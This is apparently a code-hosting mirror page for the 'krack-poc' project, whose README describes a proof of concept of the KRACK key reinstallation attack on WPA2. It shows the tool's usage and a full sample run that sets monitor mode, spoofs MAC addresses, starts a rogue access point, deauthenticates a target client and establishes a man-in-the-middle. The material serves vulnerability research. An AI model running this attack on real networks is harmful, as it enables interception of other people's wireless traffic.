MySQL>> krack-poc>> 返回
项目作者: Hackndo

项目描述 :
Krack POC
高级语言: Python
项目地址: git://github.com/Hackndo/krack-poc.git
创建时间: 2017-11-03T12:39:01Z
项目社区:https://github.com/Hackndo/krack-poc
开源协议:
下载


[NO SUPPORT] PoC Krack (Key Reinstallation AttaCKs)

PLEASE READ : I have no intention to update or maintain this code. Feel free to use and modify it, but I won’t answer to any comment/issue anymore. This project was difficult, I learnt what I wanted to learn, and developed what I wanted to develop, a quick-one-win to validate my comprehension of the vulnerability.

Proof of concept for Krack attack using channel-based MitM

Theory

French article on hackndo

Environment

WPA2 with CCMP

Usage

  1. # ./Krack.py -h
  2. usage: Krack.py [-h] [-d] -a ACCESS_POINT -i IFACE_AP -b CLIENT -j
  3.                 IFACE_CLIENT -c CHANNEL
  5. optional arguments:
  6.   -h, --help            show this help message and exit
  7.   -d, --direct          Skip channel and monitor settings
  8.   -a ACCESS_POINT, --access_point ACCESS_POINT
  9.                         Enter the SSID of the specific access point to target
  10.   -i IFACE_AP, --iface_ap IFACE_AP
  11.                         Enter the SSID of the specific access point to target
  12.   -b CLIENT, --client CLIENT
  13.                         Enter the MAC address of the specific client to target
  14.   -j IFACE_CLIENT, --iface_client IFACE_CLIENT
  15.                         Enter the SSID of the specific access point to target
  16.   -c CHANNEL, --channel CHANNEL
  17.                         Choose channel on which the targeted access point is
  18.                         listening on
  20. # ./Krack.py -a hackndo_ssid_test -i wlan1 -b "ab:cd:0a:0b:11:22" -j wlan0 -c 11
  21. [*] Turning off both interfaces
  22. [*] Setting interface wlan1 on channel 11
  23. [*] Interface wlan1 is on channel 11
  24. [*] Setting interface wlan0 on channel 4
  25. [*] Interface wlan0 is on channel 4
  26. [*] Starting monitor mode for wlan1
  27. [*] Interface wlan1 is now in monitor mode
  28. [*] Starting monitor mode for wlan0
  29. [*] Interface wlan0 is now in monitor mode
  30. [*] Turning on both interfaces
  31. [*] Trying to find hackndo_ssid_test MAC address
  32. [*] MAC Found ! 0e:cc:46:8a:b1:09
  33. [*] Jammer initialized correctly
  34. [*] Sniffing an AP Beacon...
  35. [*] AP Beacon saved!
  36. [*] Sniffing an AP Probe response...
  37. [*] AP Probe response saved!
  38. [*] Updating wlan1 MAC address to ab:cd:0a:0b:11:22 (Client MAC)
  39. [*] wlan1 MAC address update successful
  40. [*] Updating wlan0 MAC address to 0e:cc:46:8a:b1:09 (Real AP MAC)
  41. [*] wlan0 MAC address update successful
  42. [*] Rogue AP started. Sending beacons...
  43. [*] Running main loop
  44. [*] Starting deauth on AP 0e:cc:46:8a:b1:09 (hackndo_ssid_test) and client ab:cd:0a:0b:11:22...
  45. [*] Probe request to our AP
  46. [*] Client authenticated to our AP!
  47. [*] MitM attack has started
  48. [*] Deauth stopped

TODO

  • [X] Use CSA (Channel Switch Announcement) to make client switch channel after deauth (See issue #1)
  • Save data sent by client
  • Break cryptography with known plain text when counter is reinitialized